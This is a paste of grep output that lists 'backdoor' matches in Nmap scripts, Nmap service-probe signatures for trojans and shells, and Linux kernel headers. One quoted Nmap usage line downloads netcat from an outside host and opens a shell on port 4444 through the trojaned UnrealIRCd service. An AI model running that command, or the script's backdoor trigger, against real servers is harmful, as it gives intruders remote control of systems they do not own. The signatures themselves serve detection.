  250. /usr/share/nmap/scripts/smb-psexec.nse:* <code>headless</code> (boolean) If <code>headless</code> is set to true, the program doesn't return any output; rather, it runs detached from the service so that, when the service ends, the program keeps going. This can be useful for, say, a monitoring program. Or a backdoor, if that's what you're into (a Metasploit payload should work nicely). Not compatible with: <code>find</code>, <code>remove</code>, <code>noblank</code>, <code>replace</code>, <code>maxtime</code>, <code>outfile</code>.
  251. /usr/share/nmap/scripts/irc-unrealircd-backdoor.nse:Checks if an IRC server is backdoored by running a time-based command (ping)
  252. /usr/share/nmap/scripts/irc-unrealircd-backdoor.nse:The <code>irc-unrealircd-backdoor.command</code> script argument can be used to
  253. /usr/share/nmap/scripts/irc-unrealircd-backdoor.nse: $ nmap -d -p6667 --script=irc-unrealircd-backdoor.nse --script-args=irc-unrealircd-backdoor.command='wget http://www.javaop.com/~ron/tmp/nc && chmod +x ./nc && ./nc -l -p 4444 -e /bin/sh' <target>
  254. /usr/share/nmap/scripts/irc-unrealircd-backdoor.nse:<code>irc-unrealircd-backdoor.kill</code> script argument can be passed, which
  255. /usr/share/nmap/scripts/irc-unrealircd-backdoor.nse:* http://www.metasploit.com/modules/exploit/unix/irc/unreal_ircd_3281_backdoor
  256. /usr/share/nmap/scripts/irc-unrealircd-backdoor.nse:-- @args irc-unrealircd-backdoor.command An arbitrary command to run on the remote system (note, however, that you won't see the output of your command). This will always be attempted, even if the host isn't vulnerable. The pattern <code>%IP%</code> will be replaced with the ip address of the target host.
  257. /usr/share/nmap/scripts/irc-unrealircd-backdoor.nse:-- @args irc-unrealircd-backdoor.kill If set to <code>1</code> or <code>true</code>, kill the backdoored UnrealIRCd running.
  258. /usr/share/nmap/scripts/irc-unrealircd-backdoor.nse:-- @args irc-unrealircd-backdoor.wait Wait time in seconds before executing the check. This is recommended to set for more reliable check (100 is good value).
  259. /usr/share/nmap/scripts/irc-unrealircd-backdoor.nse:-- |_irc-unrealircd-backdoor: Looks like trojaned version of unrealircd. See http://seclists.org/fulldisclosure/2010/Jun/277
  260. /usr/share/nmap/scripts/irc-unrealircd-backdoor.nse: -- The 'AB' sequence triggers the backdoor to run a command.
  261. /usr/share/nmap/scripts/irc-unrealircd-backdoor.nse: if(stdnse.get_script_args('irc-unrealircd-backdoor.command')) then
  262. /usr/share/nmap/scripts/irc-unrealircd-backdoor.nse: command_extra = stdnse.get_script_args('irc-unrealircd-backdoor.command')
  263. /usr/share/nmap/scripts/irc-unrealircd-backdoor.nse: if(stdnse.get_script_args('irc-unrealircd-backdoor.wait')) then
  264. /usr/share/nmap/scripts/irc-unrealircd-backdoor.nse: local waittime = stdnse.get_script_args('irc-unrealircd-backdoor.wait')
  265. /usr/share/nmap/scripts/irc-unrealircd-backdoor.nse: stdnse.print_debug(1, "irc-unrealircd-backdoor: waiting for %i seconds", waittime)
  266. /usr/share/nmap/scripts/irc-unrealircd-backdoor.nse: stdnse.print_debug(1, "irc-unrealircd-backdoor: Sending command: %s", noop_command);
  267. /usr/share/nmap/scripts/irc-unrealircd-backdoor.nse: stdnse.print_debug(1, "irc-unrealircd-backdoor: Couldn't connect to remote host")
  268. /usr/share/nmap/scripts/irc-unrealircd-backdoor.nse: stdnse.print_debug(1, "irc-unrealircd-backdoor: Receive failed after %s: %s", noop_command, response)
  269. /usr/share/nmap/scripts/irc-unrealircd-backdoor.nse: -- Send the backdoor command.
  270. /usr/share/nmap/scripts/irc-unrealircd-backdoor.nse: stdnse.print_debug(1, "irc-unrealircd-backdoor: Sending command: %s", full_command);
  271. /usr/share/nmap/scripts/irc-unrealircd-backdoor.nse: stdnse.print_debug(1, "irc-unrealircd-backdoor: Send failed: %s", err)
  272. /usr/share/nmap/scripts/irc-unrealircd-backdoor.nse: stdnse.print_debug(1, "irc-unrealircd-backdoor: Receive failed: %s", response)
  273. /usr/share/nmap/scripts/irc-unrealircd-backdoor.nse: return "Server closed connection, possibly due to too many reconnects. Try again with argument irc-unrealircd-backdoor.wait set to 100 (or higher if you get this message again)."
  274. /usr/share/nmap/scripts/irc-unrealircd-backdoor.nse: stdnse.print_debug(1, "irc-unrealircd-backdoor: Received a response to our command in " .. elapsed .. " seconds")
  275. /usr/share/nmap/scripts/irc-unrealircd-backdoor.nse: if(stdnse.get_script_args('irc-unrealircd-backdoor.kill')) then
  276. /usr/share/nmap/scripts/irc-unrealircd-backdoor.nse: stdnse.print_debug(1, "irc-unrealircd-backdoor: Attempting to kill the Trojanned UnrealIRCd server...")
  277. /usr/share/nmap/scripts/irc-unrealircd-backdoor.nse: stdnse.print_debug(1, "irc-unrealircd-backdoor: Looks like the Trojanned unrealircd is running!")
  278. /usr/share/nmap/scripts/irc-unrealircd-backdoor.nse: stdnse.print_debug(1, "irc-unrealircd-backdoor: The Trojanned version of unrealircd probably isn't running.")
  279. /usr/share/nmap/scripts/netbus-brute.nse:Performs brute force password auditing against the Netbus backdoor ("remote administration") service.
  280. /usr/share/nmap/scripts/smtp-strangeport.nse:This may indicate that crackers or script kiddies have set up a backdoor on the
  281. /usr/share/nmap/nmap-service-probes:match backdoor m|^220 jeem\.mail\.pv ESMTP\r\n| p/Jeem backdoor/ i/**BACKDOOR**/ o/Windows/ cpe:/o:microsoft:windows/a
  282. /usr/share/nmap/nmap-service-probes:match backdoor m|^\r\nUser Access Verification\r\n\r\nYour PassWord:| p/Jeem backdoor/ i/**BACKDOOR**/ o/Windows/ cpe:/o:microsoft:windows/a
  283. /usr/share/nmap/nmap-service-probes:match backdoor m|^ \r\n$| p/OptixPro backdoor/ i/**BACKDOOR**/ o/Windows/ cpe:/o:microsoft:windows/a
  284. /usr/share/nmap/nmap-service-probes:match backdoor m|^echo o [\d.]+ \d+ >s\r\necho common>> s\r\necho common>> s\r\necho bin>> s\r\necho get m220\.exe| p/JTRAM backdoor/ i/**BACKDOOR**/ o/Windows/ cpe:/o:microsoft:windows/a
  285. /usr/share/nmap/nmap-service-probes:match backdoor m|^220 Bot Server \(Win32\)\r\n$| p/Gaobot backdoor/ i/**BACKDOOR**/ o/Windows/ cpe:/o:microsoft:windows/a
  286. /usr/share/nmap/nmap-service-probes:match backdoor m|^PWD$| p/Subseven backdoor/ i/**BACKDOOR**/ o/Windows/ cpe:/o:microsoft:windows/a
  287. /usr/share/nmap/nmap-service-probes:match backdoor m|^\r\n\[RPL\]002\r\n$| p/Subseven backdoor/ i/**BACKDOOR**/
  288. /usr/share/nmap/nmap-service-probes:match backdoor m|^=+\n= +RBackdoor ([\d.]+) | p/RBackdoor/ v/$1/ i/**BACKDOOR**/ o/Windows/ cpe:/o:microsoft:windows/a
  289. /usr/share/nmap/nmap-service-probes:match backdoor m|^220 Windrone Server \(Win32\)\r\n$| p/NerdBot backdoor/ i/**BACKDOOR**/ o/Windows/ cpe:/o:microsoft:windows/a
  290. /usr/share/nmap/nmap-service-probes:match backdoor m|^Zadej heslo:$| p/Czech "zadej heslo" backdoor/ i/**BACKDOOR**/ o/Windows/ cpe:/o:microsoft:windows/a
  291. /usr/share/nmap/nmap-service-probes:match backdoor m|^220 Reptile welcomes you\.\.\r\n| p/Darkmoon backdoor "reptile" ftpd/ i/**BACKDOOR**/ o/Windows/ cpe:/o:microsoft:windows/a
  292. /usr/share/nmap/nmap-service-probes:match backdoor m|^Sifre_EDIT$| p/ProRat trojan/ i/**BACKDOOR**/ o/Windows/ cpe:/o:microsoft:windows/a
  293. /usr/share/nmap/nmap-service-probes:match backdoor m|^MZ\x90\0\x03\0\0\0\x04\0\0\0\xff\xff\0\0\xb8\0\0\0\0\0\0\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0fn\0\0\xd0\0\0\0\x0e\x1f\xba\x0e\0\xb4\t\xcd!\xb8\x01L\xcd!This program cannot be run in DOS mode\.| p/Korgo worm/ i/**BACKDOOR**/ o/Windows/ cpe:/o:microsoft:windows/a
  294. /usr/share/nmap/nmap-service-probes:match backdoor m|^\xfa\xcb\xd9\xd9\xdd\xc5\xd8\xce\xd6| p/Theef trojan/ i/**BACKDOOR**/ o/Windows/ cpe:/o:microsoft:windows/a
  295. /usr/share/nmap/nmap-service-probes:match backdoor m|^220 SSL Connection Established - Loading Protocol\.\.\.\.\r\n| p/dhcpse.exe/ i/**BACKDOOR**/ o/Windows/ cpe:/o:microsoft:windows/a
  296. /usr/share/nmap/nmap-service-probes:match backdoor m|^A-311 Death welcome\x001| p/Haxdoor trojan/ i/**BACKDOOR**/ o/Windows/ cpe:/o:microsoft:windows/a
  297. /usr/share/nmap/nmap-service-probes:match backdoor m|^220 CAFEiNi [-\w_.]+ FTP server\r\n$| p/CAFEiNi trojan/ i/**BACKDOOR**/ o/Windows/ cpe:/o:microsoft:windows/a
  298. /usr/share/nmap/nmap-service-probes:match backdoor m=^220 (?:Stny|fuck)Ftpd 0wns j0\r?\n= p/Kibuv.b worm/ i/**BACKDOOR**/ o/Windows/ cpe:/o:microsoft:windows/a
  299. /usr/share/nmap/nmap-service-probes:match backdoor m|^220 [Sf.][tu.][nc.][yk.][F.][t.][p.][d.] [0.][w.][n.][s.] [j.][0.]\r?\n|i p/Generic Kibuv worm/ i/**BACKDOOR**/ o/Windows/ cpe:/o:microsoft:windows/a
  300. /usr/share/nmap/nmap-service-probes:match backdoor m=^(?:ba|)sh-([\d.]+)\$ = p/Bourne shell/ v/$1/ i/**BACKDOOR**/
  301. /usr/share/nmap/nmap-service-probes:match backdoor m|^exec .* failed : No such file or directory\n$| p/netcat -e/ i/misconfigured/
  302. /usr/share/nmap/nmap-service-probes:match backdoor m=220-Welcome!\r\n220-\x1b\[30m/\x1b\[31m#\xa4#\xa4#\xa4#\xa4#\xa4#\xa4#\xa4#\xa4#\xa4#\xa4#\xa4#\xa4#\xa4#\xa4#\xa4#\xa4#\xa4#\xa4#\xa4#\xa4#\xa4#\xa4#\xa4#\xa4#\xa4# \r\n220-\x1b\[30m\| Current Time: \x1b\[35m[^\r\n]*\r\n220-\x1b\[30m\| Current Date: \x1b\[35m[^\r\n]*\r\n220-\x1b\[30m\\\r\n= p/Windows trojan/ i/**BACKDOOR**/ o/Windows/ cpe:/o:microsoft:windows/a
  303. /usr/share/nmap/nmap-service-probes:match ftp m|^220-<W\x80lC0ME T0 THE \xb0GP - FXP PubSTRO\xb0 by JACK>\r\n| p/Backdoor Pubstro ftpd/ o/Windows/ cpe:/o:microsoft:windows/a
  304. /usr/share/nmap/nmap-service-probes:# Can't find any info on this ftpd. Backdoor? -Doug
  305. /usr/share/nmap/nmap-service-probes:match ftp m|^220-?\s+SSH-[\d.]+-([a-zA-Z]+)| p/FTP masquerading as $1/ i/**BACKDOOR**/
  306. /usr/share/nmap/nmap-service-probes:match meterpreter m|^\0.\x0b\0MZ\xe8\0\0\0\0\x5b\x52\x45\x55\x89\xe5\x81\xc3..\0\0\xff\xd3\x89\xc3Wh\x04\0\0\0P\xff\xd0h....h\x05\0\0\0P\xff\xd3\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0.\0\0\0\x0e\x1f\xba\x0e\0\xb4\t\xcd!\xb8\x01L\xcd!This program cannot be run in DOS mode\.\r\r\n\$\0\0\0\0\0\0\0|s p/Metasploit meterpreter/ i/**BACKDOOR**/
  307. /usr/share/nmap/nmap-service-probes:match meterpreter m|^\x16\x03\0\0\x59\x01\0\0\x55\x03\0................................\0\0\x28\0\x39\0\x38\0\x35\0\x16\0\x13\0\x0a\0\x33\0\x32\0\x2f\0\x07\0\x05\0\x04\0\x15\0\x12\0\x09\0\x14\0\x11\0\x08\0\x06\0\x03\x01\0\0\x04\0\x23\0\0$|s p/Metasploit meterpreter metsvc/ i/**BACKDOOR**/
  308. /usr/share/nmap/nmap-service-probes:match netdevil m|^pass_pleaz$| p/Net-Devil backdoor/ i/**TROJAN**/ o/Windows/ cpe:/o:microsoft:windows/a
  309. /usr/share/nmap/nmap-service-probes:# Backdoor shell!
  310. /usr/share/nmap/nmap-service-probes:match shell m|^(?:ba)?sh-\d\.\d\d\w?# $| p/ROOT SHELL/ i/**BACKDOOR**/ o/Unix/
  311. /usr/share/nmap/nmap-service-probes:match shell m|^:: w4ck1ng-shell \(Private Build v([\w._-]+)\) bind shell backdoor :: \n\n| p/w4ck1ng-shell/ v/$1/ i/**BACKDOOR**/
  312. /usr/share/nmap/nmap-service-probes:match ssh m|^SSH-1\.5-FucKiT RootKit by Cyrax\r?\n| p/FucKiT RootKit sshd/ i/**BACKDOOR** protocol 1.5/ o/Linux/ cpe:/o:linux:linux_kernel/a
  313. /usr/share/nmap/nmap-service-probes:match ssh m|^SSH-1\.5-By-ICE_4_All \( Hackers Not Allowed! \)\r?\n| p/ICE_4_All backdoor sshd/ i/**BACKDOOR** protocol 1.5/
  314. /usr/share/nmap/nmap-service-probes:match winshell m=^Microsoft Windows( (?:2000|XP|NT 4\.0)|) \[Version ([\d.]+)\]\r\n\(C\) Copyright 1985-20\d\d Microsoft Corp\.\r\n\r\n= p/Microsoft Windows$1 $2 cmd.exe/ i/**BACKDOOR**/ o/Windows/ cpe:/o:microsoft:windows/a
  315. /usr/share/nmap/nmap-service-probes:match winshell m|^Microsoft Windows \[Version ([\d.]+)\]\r\nCopyright \(c\) 20\d\d Microsoft Corporation\. All rights reserved\.\r\n\r\n| p/Microsoft Windows $1 cmd.exe/ i/**BACKDOOR**/ o/Windows/ cpe:/o:microsoft:windows/a
  316. /usr/share/nmap/nmap-service-probes:match backdoor m|^Can't fork pty, bye!\n$| p/PsychoPhobia backdoor/ i/**BACKDOOR**/
  317. /usr/share/nmap/nmap-service-probes:match bittorrent-tracker m|^This is not a rootkit or other backdoor, it's a BitTorrent\r\nclient\. Really\.| p/Transmission bittorrent tracker/
  318. /usr/share/nmap/nmap-service-probes:match shell m|^bash: line 1: \r: command not found\nbash: line 2: \r: command not found\n| p/Bash shell/ i/**BACKDOOR**/
  319. /usr/share/nmap/nmap-service-probes:match spy-net m=^tentarnovamente\|\r\ntentarnovamente\|\r\n= p/Spy-Net or CyberGate backdoor/ i/**BACKDOOR**/
  320. /usr/share/nmap/nmap-service-probes:match backdoor m|^sh-2\.05b\$ | p/r0nin rootkit backdoor/
  321. /usr/share/nmap/nmap-service-probes:match backdoor m|^:[-\w_.]+ 451 GET :\r\n| p/**BACKDOOR**/ o/Windows/ cpe:/o:microsoft:windows/a
  322. /usr/share/nmap/nmap-service-probes:match backdoor m|^<HTML>\n<HEAD>\n<TITLE>Directory /</TITLE>\n<BASE HREF=\"file:/\">\n</HEAD>\n<BODY>\n<H1>Directory listing of /</H1>| p/No-auth shell/ i/**BACKDOOR**/ o/Unix/
  323. /usr/share/nmap/nmap-service-probes:match http m|^HTTP/1\.0 200 Ok\nDate: .*\nContent-type: text/html\n\n<font size=\"-4\">\nIf you can read this, you are sitting too close to the monitor\.\n</font>\n| p/Unknown trojan/ i/**BACKDOOR**/ o/Windows/ cpe:/o:microsoft:windows/a
  324. /usr/share/nmap/nmap-service-probes:match smtp m|^220 ESMTP service ready\r\n250\x20ok\r\n| p/Rustock smtp backdoor/ i/**BACKDOOR**/ o/Windows/ cpe:/o:microsoft:windows/a
  325. /usr/share/nmap/nmap-service-probes:match mydoom m|\x04\x5b\0\0\0\0\0\0| p/MyDoom virus backdoor/ v/v012604/
  326. /usr/share/nmap/nmap-service-probes:match backdoor m|^666(\d+)\xff(\d+)\xff(\d+)\xff$| p/Beast Trojan/ v/version 2/ i/**BACKDOOR**; No password; New server port: $1; New client ports: $2, $3/ o/Windows/ cpe:/o:microsoft:windows/a
  327. /usr/share/nmap/nmap-service-probes:# Arucer backdoor
  328. /usr/share/nmap/nmap-service-probes:match arucer m|^\xbc\xa0\xb6$| p/Arucer backdoor/ i/**BACKDOOR**/ o/Windows/ cpe:/o:microsoft:windows/a
  329. /usr/share/nmap/nselib/data/psexec/backdoor.lua:---This config file is designed for adding a backdoor to the system. It has a few
  330. /usr/share/nmap/nmap-services:zincite-a 1034/tcp 0.001064 # Zincite.A backdoor
  331. /usr/share/nmap/nmap-services:java-or-OTGfileshare 1050/tcp 0.001669 # J2EE nameserver, also OTG, also called Disk/Application extender. Could also be MiniCommand backdoor OTGlicenseserv
  332. /usr/share/nmap/nmap-services:netbus 12345/tcp 0.000527 # NetBus backdoor trojan or Trend Micro Office Scan
  333. /usr/share/nmap/nmap-services:netbus 12346/tcp 0.000088 # NetBus backdoor trojan
  334. /usr/share/nmap/nmap-services:kuang2 17300/tcp 0.000013 # Kuang2 backdoor
  335. /usr/src/linux-headers-3.11.0-15/include/video/gbe.h:#define GBE_VOF_MAGICKEY 0x2000 /* Backdoor key */
  336. /usr/src/linux-headers-3.11.0-15/include/video/sgivw.h:#define DBE_VOF_MAGICKEY 0x2000 /* Backdoor key */
  337. /usr/src/linux-headers-3.11.0-15/arch/ia64/include/asm/sn/shubio.h: * (mark bit) via backdoor access to the pertinent CRB entry. This *
  338. /usr/src/linux-headers-3.11.0-14/include/video/gbe.h:#define GBE_VOF_MAGICKEY 0x2000 /* Backdoor key */
  339. /usr/src/linux-headers-3.11.0-14/include/video/sgivw.h:#define DBE_VOF_MAGICKEY 0x2000 /* Backdoor key */
  340. /usr/src/linux-headers-3.11.0-14/arch/ia64/include/asm/sn/shubio.h: * (mark bit) via backdoor access to the pertinent CRB entry. This *
  341. /usr/src/linux-headers-3.11.0-13/include/video/gbe.h:#define GBE_VOF_MAGICKEY 0x2000 /* Backdoor key */
  342. /usr/src/linux-headers-3.11.0-13/include/video/sgivw.h:#define DBE_VOF_MAGICKEY 0x2000 /* Backdoor key */
  343. /usr/src/linux-headers-3.11.0-13/arch/ia64/include/asm/sn/shubio.h: * (mark bit) via backdoor access to the pertinent CRB entry. This *
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement